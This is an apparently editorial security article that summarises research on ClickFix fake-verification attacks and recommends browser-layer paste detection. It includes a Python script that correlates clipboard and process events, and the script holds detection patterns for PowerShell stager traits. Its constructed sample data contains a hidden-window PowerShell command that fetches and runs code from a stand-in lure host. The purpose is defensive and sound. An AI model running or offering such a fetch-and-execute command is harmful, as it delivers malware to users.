By NHI Mgmt Group Editorial Team
Published 2025-11-06
Domain: Governance & Risk
Source: Push Security

TL;DR: ClickFix has become a dominant initial access method, with Microsoft reporting it accounted for 47% of attacks in the last year, while Push Security shows the lures are evolving across page design, delivery channels, and payload execution. Endpoint-only interception is now a single point of failure, especially where browser-based code execution and unmanaged devices are in scope.


At a glance

What this is: This is a Push Security analysis of how ClickFix pages, delivery methods, and payloads are evolving to bypass traditional phishing and endpoint defenses.

Why it matters: It matters because IAM and security teams need controls that address browser-mediated malicious execution, not just email phishing or host-based malware blocking.

By the numbers:

  • ClickFix was the most common initial access method in the last year, accounting for 47% of attacks.



Context

ClickFix is a social engineering pattern that tricks users into pasting and running malicious commands under the guise of a verification step. The security gap is not only user deception, but the fact that the attack moves execution into the browser and then onto the endpoint, where traditional controls may see too little context too late.

For identity and access teams, the relevant question is whether current defenses assume malicious activity will arrive through email, authentication prompts, or clearly suspicious downloads. This article shows why browser-mediated execution, unmanaged devices, and browser-stored credentials require a broader control model than email-first phishing defenses.

The pattern is especially relevant where organisations rely on EDR alone to catch malicious script execution after the user has already initiated it. That starting point is increasingly typical, not exceptional.


Key questions

Q: How should security teams stop ClickFix attacks before the user reaches the endpoint?

A: Teams should focus on browser-layer controls that detect suspicious paste events, fake verification pages, and malicious command prompts before execution begins. That approach reduces dependence on EDR alone and gives defenders a chance to intervene before the user runs code that the browser and endpoint may interpret as legitimate interaction.

Q: Why do ClickFix attacks bypass many traditional phishing controls?

A: They often arrive through search, malvertising, or compromised websites rather than email, so email-centric filters never see them. Because the lure is delivered in a browser and the code is pasted locally, the attack can evade the security stack that assumes suspicious activity will originate from email attachments or links.

Q: What breaks when endpoint detection is the only control for malicious copy-and-paste attacks?

A: The main failure is timing. Endpoint detection only sees the event after the user has already executed the command, which means the most important trust decision has passed. If the control lacks browser context, it may also misclassify the activity as user-initiated and benign.

Q: What should organisations do when employees use unmanaged devices for web access?

A: They should assume browser telemetry and host enforcement will be incomplete and design for inconsistent coverage. That means prioritising browser-side prevention, tightening access assumptions for sensitive applications, and validating whether BYOD endpoints can be monitored well enough to detect malicious paste-driven execution.


Technical breakdown

How ClickFix lures use browser trust to trigger code execution

ClickFix attacks rely on a deceptive web page that presents a fake verification or bot-check flow, often with visual cues such as timers, embedded video, or device-specific instructions. The user is then prompted to paste or run code, which turns social engineering into local execution. Because the payload is copied through the browser sandbox, many security tools cannot observe the malicious action at the point where it matters. Browser-mediated command execution should therefore be treated as a distinct control problem, not just a phishing variant.

Practical implication: add browser-layer detection and policy controls before the command reaches the endpoint.

Why non-email delivery expands the attack surface

The article shows that ClickFix pages are often delivered through Google Search, poisoned results, malvertising, compromised sites, and other non-email paths. That matters because many anti-phishing controls are wired into email security, so an entire detection layer is bypassed when the lure arrives elsewhere. Attackers also rotate domains, use bot protection, and heavily obfuscate page content to avoid blocklists and scanners.

Practical implication: expand detection and monitoring beyond email to search, web, and browser channels.

How payload staging shifts from script execution to living-off-the-land abuse

Once the user executes the copied content, attackers commonly rely on LOLBINs such as PowerShell or mshta, or on techniques like cache smuggling that stage a malicious file locally without obvious network retrieval. This is dangerous because the initial script often acts as a stager for later payloads, so the observed event may look routine unless the endpoint control has enough behavioural context.

Practical implication: correlate browser, process, and script signals to catch staged payload execution.
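The two implications above, a browser-layer check on the paste event and correlation of browser, process, and script signals, can be shown together in one piece of detection logic. The following is an added example written for this summary; it is not code from Push Security or NHI Mgmt Group. The telemetry field layout (a clipboard-write event carrying page text, a process-creation event carrying parent image and command line), the list of verification-page cues, the LOLBIN set, the 180-second window and the 0.6 overlap threshold are all assumptions, and the sample events are constructed.

```python
"""Added example: score a browser clipboard write for ClickFix traits, then
correlate it with LOLBIN process launches on the same host.
Telemetry layout, cue list, window and thresholds are assumptions."""
import re
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass
class ClipboardEvent:
    """Assumed browser telemetry: a page wrote to the clipboard."""
    ts: datetime
    host: str
    url: str
    page_text: str       # visible page text at the time of the copy
    clipboard_text: str  # what the page placed on the clipboard


@dataclass
class ProcessEvent:
    """Assumed endpoint telemetry: a process was created."""
    ts: datetime
    host: str
    parent_image: str
    image: str
    cmdline: str


# Phrases typical of fake verification flows (assumed list; extend from observed lures)
LURE_CUES = ("verify you are human", "not a robot", "win + r", "win+r", "ctrl + v", "ctrl+v", "paste")
LOLBINS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}
RUN_DIALOG_PARENTS = {"explorer.exe"}   # Win+R launches are children of explorer.exe
INTERPRETER_PREFIX = re.compile(r"^\s*(powershell|pwsh|mshta|cmd)\b", re.I)
STAGER_TRAITS = re.compile(
    r"-w(indowstyle)?\s*hidden|-e(nc|ncodedcommand)?\s+\S{16,}|invoke-webrequest"
    r"|\biwr\b|\birm\b|\biex\b|downloadstring|https?://", re.I)
CORRELATION_WINDOW = timedelta(seconds=180)


def score_clipboard_event(ev: ClipboardEvent):
    """Return (score, reasons); each independent signal adds one point."""
    reasons = []
    cues = [c for c in LURE_CUES if c in ev.page_text.lower()]
    if cues:
        reasons.append(f"verification-style cues on page: {cues}")
    if INTERPRETER_PREFIX.search(ev.clipboard_text):
        reasons.append("clipboard content begins with a command interpreter")
    if STAGER_TRAITS.search(ev.clipboard_text):
        reasons.append("clipboard content has hidden-window, encoded or remote-fetch traits")
    return len(reasons), reasons


def browser_layer_verdict(ev: ClipboardEvent) -> str:
    """Decision a browser-side control can take before anything executes."""
    score, _ = score_clipboard_event(ev)
    return "block" if score >= 2 else "allow"


def _tokens(s: str):
    return {t for t in re.split(r"[\s\"']+", s.lower()) if len(t) > 2}


def correlate(clipboard_events, process_events):
    """Join flagged clipboard writes to LOLBIN launches on the same host within the window."""
    alerts = []
    for ce in clipboard_events:
        score, reasons = score_clipboard_event(ce)
        if score < 2:
            continue
        clip_tokens = _tokens(ce.clipboard_text)
        for pe in process_events:
            if pe.host != ce.host or pe.image.lower() not in LOLBINS:
                continue
            delta = pe.ts - ce.ts
            if not (timedelta(0) <= delta <= CORRELATION_WINDOW):
                continue
            overlap = len(clip_tokens & _tokens(pe.cmdline)) / max(1, len(clip_tokens))
            from_run_dialog = pe.parent_image.lower() in RUN_DIALOG_PARENTS
            if overlap < 0.6 and not from_run_dialog:
                continue
            alerts.append({
                "host": ce.host, "url": ce.url, "image": pe.image,
                "lead_seconds": delta.total_seconds(),  # how far ahead the browser saw it
                "cmdline_overlap": round(overlap, 2),
                "from_run_dialog": from_run_dialog,
                "reasons": reasons,
            })
    return alerts


# Constructed sample telemetry: one lure page, one benign documentation copy.
T0 = datetime(2025, 11, 6, 9, 0, 0)
SAMPLE_CLIPBOARD = [
    ClipboardEvent(T0, "ws-17", "https://lure.example.invalid/check",
                   "Verify you are human. Step 1: press Win + R. Step 2: press Ctrl + V, then Enter.",
                   'powershell -w hidden -c "iwr https://lure.example.invalid/v | iex"'),
    ClipboardEvent(T0 + timedelta(minutes=5), "ws-17", "https://docs.example.invalid/powershell",
                   "Get-ChildItem documentation. Copy the example below.",
                   "Get-ChildItem -Path C:\\Logs -Recurse"),
]
SAMPLE_PROCESSES = [
    ProcessEvent(T0 + timedelta(seconds=41), "ws-17", "explorer.exe", "powershell.exe",
                 'powershell -w hidden -c "iwr https://lure.example.invalid/v | iex"'),
    ProcessEvent(T0 + timedelta(minutes=6), "ws-17", "WindowsTerminal.exe", "powershell.exe",
                 "powershell -NoProfile -Command Get-ChildItem -Path C:\\Logs -Recurse"),
    ProcessEvent(T0 + timedelta(seconds=70), "ws-22", "explorer.exe", "powershell.exe",
                 'powershell -w hidden -c "iwr https://lure.example.invalid/v | iex"'),
]

if __name__ == "__main__":
    for ev in SAMPLE_CLIPBOARD:
        print(ev.url, "->", browser_layer_verdict(ev))
    for alert in correlate(SAMPLE_CLIPBOARD, SAMPLE_PROCESSES):
        print(alert)
```

The browser-side verdict is the earlier of the two decision points: it is available the moment the page writes to the clipboard, while the correlated alert only exists once the interpreter has started. The `lead_seconds` field records that gap, and the docs-page event shows why the interpreter prefix alone is not enough to block: a legitimate command copied from documentation scores zero. Both thresholds are starting points to tune against your own browser and EDR telemetry.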


Threat narrative

Attacker objective: The attacker wants to gain a reliable foothold and credential access by converting user trust into executable code and browser-session compromise.

  1. Entry begins with a convincing ClickFix page that reaches the victim through search, malvertising, or a compromised web property rather than email.
  2. Escalation occurs when the user pastes and runs code in the browser-driven flow, allowing the attacker to execute script or LOLBIN-based staging on the endpoint.
  3. Impact follows when the stager delivers malware or harvests browser-stored credentials and cookies, creating access that bypasses traditional phishing-only controls.



NHI Mgmt Group analysis

ClickFix is a browser trust failure before it is an endpoint failure. The attack works because users still treat browser prompts and page-based instructions as lower risk than downloads or email attachments. That assumption breaks when the browser itself becomes the delivery and execution layer. The implication is that identity and security programmes must treat browser-mediated action as a first-class control surface.

Endpoint-only interception creates a single point of failure for malicious copy-and-paste attacks. Once code is copied inside the browser sandbox, EDR becomes the last line of defense rather than the primary one. That is a fragile governance model because it assumes the endpoint will see enough context to decide correctly after execution has already begun. Practitioners should regard this as a control-layer gap, not a tuning problem.

Browser execution window: the point at which social engineering crosses into local code execution has become the decisive security boundary. This boundary matters because the attacker no longer needs a traditional attachment or a credential prompt. They need only enough page credibility to induce the user to run the command. Security teams should anchor policy and detection around that transition, not around email alone.

Unmanaged device exposure magnifies the control gap. If employees and contractors can use BYOD endpoints, the organisation may not have consistent telemetry or enforcement when the malicious paste event occurs. That makes browser-layer controls more important, not less, because the trust decision happens before host assurance can help. The practitioner conclusion is that device variability must be assumed, not exceptionalised.

Malicious copy-and-paste attacks expose a governance assumption that user-initiated actions are safe enough to defer to endpoint review. That assumption was designed for workflows where execution follows administrative intent or known automation. It fails when the actor is the user being manipulated in real time by a browser lure, because the security decision arrives after the decisive action. The implication is that the programme must rethink where trust is granted, not merely add another alert.

From our research:

  • 85% of organisations lack full visibility into third-party vendors connected via OAuth apps, according to The State of Non-Human Identity Security.
  • Only 1 in 4 organisations are already investing in dedicated NHI security capabilities, which leaves most teams relying on general controls rather than identity-specific visibility.
  • If you are building a broader identity control model, start with Ultimate Guide to NHIs, Key Challenges and Risks to map where visibility, privilege, and lifecycle gaps overlap.

What this signals

Browser-mediated execution is now a governance problem, not just a malware problem. Teams that still treat malicious code execution as an endpoint-only issue will keep missing the earliest decision point, which is the browser page that persuades the user to act. The practical signal is whether your controls can see and stop the paste event before it becomes a process on the host.

Copy-and-paste attacks expose a control boundary that current phishing programmes do not cover. If your organisation relies mainly on email security, the attacker can simply move the lure into search and web channels. Security teams should test whether browser telemetry, web filtering, and endpoint response are operating as one detection chain rather than three disconnected tools.

Browser-layer controls help reduce identity risk when credentials and session data are stored in the browser. Once attackers use ClickFix to get a foothold, the real objective often shifts to cookies, tokens, and saved credentials. That makes browser protection relevant to IAM teams as well as endpoint teams, because session compromise can become identity compromise quickly.


For practitioners

  • Deploy browser-layer copy-and-paste detection: Block or flag suspicious paste events before they reach the endpoint, especially when the page presents verification or bot-check behaviour.
  • Expand monitoring beyond email delivery: Instrument search, web, and browser telemetry so poisoned search results and malvertising are visible alongside email-based phishing attempts.
  • Correlate browser and process signals: Join browser activity, script launch, and LOLBIN execution data to distinguish user-driven commands from ordinary admin workflows.
  • Assume BYOD gaps in host coverage: Review whether unmanaged devices receive the same browser telemetry and policy enforcement as corporate endpoints, then close the coverage gap where they do not.

Key takeaways

  • ClickFix turns browser trust into local execution, which is why it succeeds even when users are not explicitly downloading malware.
  • The evidence points to a control gap, not a single bad lure: non-email delivery, payload staging, and unmanaged devices all reduce the value of endpoint-only defense.
  • Practitioners should move the control boundary upstream into the browser, where paste events and execution prompts can still be intercepted.

Standards & Framework Alignment

This section maps relevant standards and security frameworks to the operational risks and controls described in this guidance.

The OWASP Non-Human Identity Top 10 addresses the attack and risk surface, while NIST CSF 2.0 and NIST Zero Trust (SP 800-207) set the governance and control requirements practitioners need to meet.

Framework | Control / Reference | Relevance
NIST CSF 2.0 | DE.CM-7 | Browser and endpoint telemetry correlation supports continuous monitoring of malicious execution paths.
OWASP Non-Human Identity Top 10 | | ClickFix often targets credentials and session material stored in browsers and related identity tooling.
NIST Zero Trust (SP 800-207) | PR.AC-1 | Search-delivered lures and BYOD gaps show why access decisions need continuous verification.

Assume the browser path is hostile and verify device and session context before granting sensitive access.


Key terms

  • ClickFix: A ClickFix attack is a social engineering technique that persuades a user to paste and run malicious code under the guise of a routine verification step. It abuses trust in browser content and user instruction flow, turning a simple interaction into local execution.
  • Living-off-the-land binary: A living-off-the-land binary is a legitimate operating system utility that attackers abuse to run code, stage payloads, or evade obvious malware detection. In practice, it lets malicious activity blend into normal administrative behaviour while using tools already present on the endpoint.
  • Browser sandbox: A browser sandbox is the constrained execution environment used by web browsers to isolate web content from the underlying device. It improves safety for normal browsing, but it can also hide the malicious context of copy-and-paste actions from security tools that only observe the host.

Deepen your knowledge

NHI governance, agentic AI identity, and machine identity security are core topics in our NHI Foundation Level course, the industry's only accredited NHI security programme. If you are responsible for identity security strategy or NHI governance in your organisation, it is worth exploring.

This post draws on content published by Push Security: breaking down the most sophisticated ClickFix page seen in the wild. Read the original.

NHIMG Editorial Note
Published by the NHIMG editorial team on 2025-11-06.
NHI Mgmt Group — the independent authority on Non-Human Identity, IAM, and Agentic AI security. nhimg.org